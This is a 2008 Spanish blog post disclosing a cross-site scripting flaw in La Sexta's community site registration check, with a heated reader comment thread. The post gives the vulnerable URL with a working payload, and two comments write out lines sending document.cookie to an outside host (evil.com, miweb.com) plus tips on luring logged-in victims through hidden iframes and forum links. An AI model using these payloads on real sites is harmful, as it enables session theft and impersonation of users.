Agujero de seguridad grave en La Sexta

Últimamente está de moda en las cadenas de televisión, modificar cosas de la wikipedia, poniendo datos erróneos para reírse de que dicha enciclopedia se puede alterar por cualquiera…

Es irónico que las cadenas de televisión, donde mas se manipula, hagan este tipo de cosas, y es muy hipócrita que se rían de lo fácil que es alterar la wikipedia, cuando ellos de cada 4 noticias que dan, 7 son alteradas y manipuladas… Pero claro, ellos lo que quieren es ser los únicos con el poder de redactar lo que la gente lee…en fin.

Dejándome de rodeos, me ha sentado tan mal el incidente del follonero con la sexta, que he decidido mirar un poco por su web, a ver que tan bien hacen las cosas ellos, evidentemente, no pienso dar ningún detalle de como utilizar lo que voy a explicar aquí para hacer ningún daño, no pienso ayudar a ningún “cracker” aburrido a hacer de las suyas, pero si voy a explicar un poco, lo seguros que están tus datos con la sexta.

Investigando un poco he visto que cuando te vas a registrar en:

http://comunidad.lasexta.com/

Te da la opción de comprobar si tu nombre de usuario está libre o no, esto hace una petición ajax, que responde con el resultado.

Dicha petición es algo así:

http://comunidad.lasexta.com/comunidad/comprobar_login/0.40978486285709026/usuario

donde “usuario” es el nombre de usuario a comprobar, bien, si en ese campo metemos código xhtml:

http://comunidad.lasexta.com/comunidad/comprobar_login/0.40978486285709026/lol%22%3E%3Cbody%20onload=%22alert(document.cookie);%22%3E

Conseguimos acceso a las cookies del usuario, que podríamos reenviar hacia una web nuestra, utilizando document.location y pasando document.cookie como parámetro GET.

No se como hacen un programa metiéndose con la wikipedia, teniendo ellos sistemas así de vulnerables…

31 Responses to “Agujero de seguridad grave en La Sexta”


  1. 1 Mike agosto 28, 2008 a las 8:47 pm

    Grande, muy grande. Internet is serious business

  2. 2 Albert agosto 28, 2008 a las 8:50 pm

    A ver chaval, pero exactamente que coño es lo que has conseguido? ver tus cookies? eres un jacker!!! anda ve y corre a contárselo a tus amiguitos, lo que no entiendo es como subnormalidades como esta acaban en meneame.

  3. 3 KaRMaN agosto 28, 2008 a las 8:58 pm

    Zas! en todo el código.

  4. 4 Vii agosto 28, 2008 a las 8:59 pm

    Con eso lo único que estás haciendo es inyectar HTML en la respuesta que finalmente se muestra en TU propio navegador… no estás logrando acceso a datos del servidor, sino a los tuyos propios…

  5. 5 Vii agosto 28, 2008 a las 9:02 pm

    Aunque bien cierto es (perdón por el doble post) que deberían haber validado mejor el nick y pasarlo por un htmlentities o algo a la hora de imprimirlo… pero es una cagadilla poco importante que no compromete la seguridad de la web…

  6. 6 rooibo agosto 28, 2008 a las 9:02 pm

    A ver Albert y Vii, sois unos ignorantes, al tener código Javascript que se ejecuta y que se puede controlar, basta con crear un enlace, con un código estilo:

    document.location=’http://evil.com/index.php?c=’+document.cookie+’;

    Para pasar la cookie a un tercero, mediante get.

    Para conseguir que alguien visite ese enlace, basta insertarlo en un iframe invisible en cualquier web, y esperar a que vayan cayendo cookies.

    Cuanta ignorancia, por dios

  7. 7 Vii agosto 28, 2008 a las 9:11 pm

    rooibo gracias por la aclaración, aunque creo que podrías haberlo dicho sin ser tan borde. Puedo aceptar mi ignorancia pero no tu falta de educación.

    Un saludo.

  8. 8 rooibo agosto 28, 2008 a las 9:13 pm

    Siento si he parecido poco educado, es que negar un bug tan flagrante…me ha parecido chocante, te pido disculpas si te he ofendido.

  9. 9 Adrián Navarro agosto 28, 2008 a las 9:16 pm

    No es aceptar ignorancia. Es que es hay que tener paciencia para soportar a gente que suelta cosas del tipo que no sirve para nada y que además va de lista. Al menos ha dado el repaso.🙂

  10. 10 David agosto 28, 2008 a las 9:16 pm

    Para Albert y Vii, lo conseguiría facilmente haciendo

    document.location.href=”http://miweb.com/?var=”+document.cookie.indexOf… (…)

    De esta manera puedes acceder a las cuentas de usuario de cualquier sesión que te llegue (el PHPSESSID).

    Para conseguir que los usuarios lleguen a esa URL… pones enlaces en otras webs, en los foros y blogs de la sexta, donde sea, a esa dirección con ese código, esperando que lleguen “incautos”, previamente logeados en la comunidad, eso sí.

    Lo siento, pero es trivial.

    Un saludo

  11. 11 OceanO agosto 28, 2008 a las 9:53 pm

    Vii, me parece que el tono de rooibo iba más dirigido a Albert que a ti. A mi me parece un problema serio, aunque como este me temo que hay a patadas en muchas webs. Simplemente nadie se suele parar a mirarlos tanto.
    En cualquier caso, creo que lo que se podría lograr al final es suplantar la identidad de otros usuarios en la web de la Sexta afectada, que no sé como de serio puede ser. Si me equivoco, creo que rooibo podrá corregirme, porque yo también soy un ignorante😉. Fallo, de todas formas, y les está bien empleado que alguien les haya husmeado sus propias miserias, por vándalos.

  12. 12 rooibo agosto 28, 2008 a las 10:06 pm

    No te equivocas OceanO, y gracias por tu comentario🙂

    Es exactamente eso, yo he pensado que es grave que se suplante la identidad de nadie, y con ello, se utilice su cuenta en la sexta, en su nombre, pero eso ya queda a juicio de cada uno.

  13. 14 helmer agosto 28, 2008 a las 10:11 pm

    -Vandalizar una entrada de Wikipedia en TV para reírse un rato, 0 €
    -Entrar en la web de la Sexta y que un juanker te robe la cookie de sesión, no tiene precio…

    Para todo lo demás, Firefox+NoScript😉

  14. 15 blackhardy agosto 28, 2008 a las 11:18 pm

    El caso es que la wikipedia no tiene ninguna fiabilidad cuando todo quisqui puede manipilar lo que quiera.

  15. 16 Ruben agosto 29, 2008 a las 2:19 am

    Hola rooibo.

    No pienso dar ningún detalle de como utilizar lo que voy a explicar aquí para hacer ningún daño, no pienso ayudar a ningún “cracker” aburrido a hacer de las suyas.

    No tenías que caer en la trampa inocente de “ingeneria social” de Vii y Albert, a la próxima no tienes que dar más detalles, con el post tan bien explicado, ya se deduce que hablas para entendidos🙂

    Saludos,

  16. 17 OceanO agosto 29, 2008 a las 6:45 am

    Bueno, rooibo, ¡vaya estreno de blog!
    16 comentarios en tu blog (más alguno que creo que has borrado) y 73 en menéame, además de 263 meneos y muuuucha polémica.
    Bienvenido tu blog. Intentaré echar un ojo de vez en cuando.

  17. 18 nobody agosto 29, 2008 a las 7:01 am

    Pero que me estás contando, un XSS en una web, no se como el bug del BGP te ha hecho sombra y no has acabado de portada en 20minutos.

    Hay que joderse…

    Vaporware de noticia.

  18. 19 Alex agosto 29, 2008 a las 7:19 am

    Uff, pedazo de bug.

    Con esto no te limpias ni el culo.

  19. 20 Iñaki agosto 29, 2008 a las 7:42 am

    El XSS es un arte que pocos saben apreciar… Le viene bien ese refrán del ojo, la viga y la paja.

    Un saludo y sindicado quedas😛

  20. 21 Flipando agosto 29, 2008 a las 8:07 am

    A ver, tranquis.
    Que agujeros de seguridad hay por todos lados. QUE ESTO ES INTERNET…
    Informáticos, tenistas y ajedrecistas… cuánta rivalidad, pordióhhh!!!

  21. 22 Zoquete agosto 29, 2008 a las 8:18 am

    Bravo amigo, has encontrado un cross-site scripting. Eres el puto amo de la seguridad informática.

    Venga, ¿Nos dedicamos a postear en meneame todos los XSS que contremos para ganar notariedad? ¡Que bueno que soy!

    PA-TE-TI-CO.

    Vulnerabilidades como esta las hay miles, y en webs más importantes que la mierda esta de lasexta. Lo más curioso son comentarios del estilo “No quiero dar más detalles”, “Hasta aquí puedo leer”, como si del gran secreto nacional se tratara… Anda, vendele el cuento a otro, que no estas descubriendo nada, y vulnerabilidades como esta las sabe explotar hasta mi abuela tuerta.

  22. 23 Laura agosto 29, 2008 a las 10:10 am

    Pues nose, igual tu y tu abuela tuerta sois los reyes del universo, porque yo he estudiado informática y no sé hacer esto.. será que soy de redes.

  23. 24 Salba agosto 29, 2008 a las 10:46 am

    Yo flipo con la gente… jeje… menudos comentarios… aqui todo el mundo sabe como hackear una web… todos sabemos entrar en el ordenador del FBI… jeje…

    Yo llevo un tiempo haciendo webs y nunca habia caido en el error que has comentado, a partir de ahora le hechare un vistazo… gracias!.

    En cuanto lo de que la sexta editase la wikipedia me parece una tonteria… que una web como lasexta.com cometa un fallo como ese me parece garrafal…

    Si algun otro sabio de la informatica que lleva desde los siete años programando y que en sus ratos libres se dedica a pintar la torre de su pc no sabe apreciar el error que el autor del post a encontrado… pues no se… que continue planificando con sus colegas el ataque galactico a la web de su colegio… jeje…

    Bueno… buen post!

  24. 25 shitworld agosto 29, 2008 a las 4:15 pm

    Laura, quizás es que no aprovechaste tus estudios

  25. 26 El Observador agosto 29, 2008 a las 6:00 pm

    Shitworld, quizá en la universidad enseñan cosas absurdas que en la vida real no sirven para nada y por eso ante errores así se siente perdida.

    Tal vez tendria que haber hecho como tu y faltar a la mitad de las clases para dedicarse a jugar a los hackers, si es que realmente tu si que sabes como aprovecharte del error…

  26. 27 php agosto 30, 2008 a las 8:38 pm

    es un error bastante comun en los programadores de nivel medio para bajo, y no olvideis que muchos correos, bancos, foros, etc eran vulnerables hasta hace muy poco (o lo siguen siendo), y tampoco ayuda el uso de ajax y tener que mostrar demasiados datos a un posible atacante.

    por lo demas lo que hizo el follonero esta muy mal, demuestra una total falta de respeto cosa que tampoco me extraña mucho viniendo de cierta gente.

  27. 28 Jose agosto 30, 2008 a las 11:42 pm

    Que cantidad de gilipollas que corren por meneame, no? Yo no es por nada, pero una cosa es criticar, y otra… En vez de echar mierda, uno muestra su disconformidad con el silencio y andando.

    Un saludo rooibo! Tu segundo post y una de las 7 plagas en forma de “efecto menéame”😉

  28. 29 rooibo agosto 31, 2008 a las 12:05 am

    Gracias por tu comentario Jose, no hay que darles importante, cuando son muy sálidos de tono los borro🙂

  29. 30 Daniel R. septiembre 4, 2008 a las 2:58 pm

    Pero gente de esa que va de lista las hay en todos lados… =_=


  1. 1 » La Semana en 10 links (31 de Agosto) Alejandro Suárez Sánchez-Ocaña Trackback en agosto 31, 2008 a las 7:06 am

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s





A %d blogueros les gusta esto: